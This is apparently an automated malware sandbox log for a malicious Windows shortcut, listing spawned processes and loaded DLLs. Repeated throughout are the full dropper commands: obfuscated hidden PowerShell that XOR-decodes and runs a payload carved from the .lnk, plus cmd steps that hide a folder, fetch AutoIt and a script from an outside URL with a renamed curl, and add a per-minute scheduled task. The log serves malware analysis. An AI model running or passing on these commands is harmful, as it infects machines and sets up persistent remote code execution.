vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

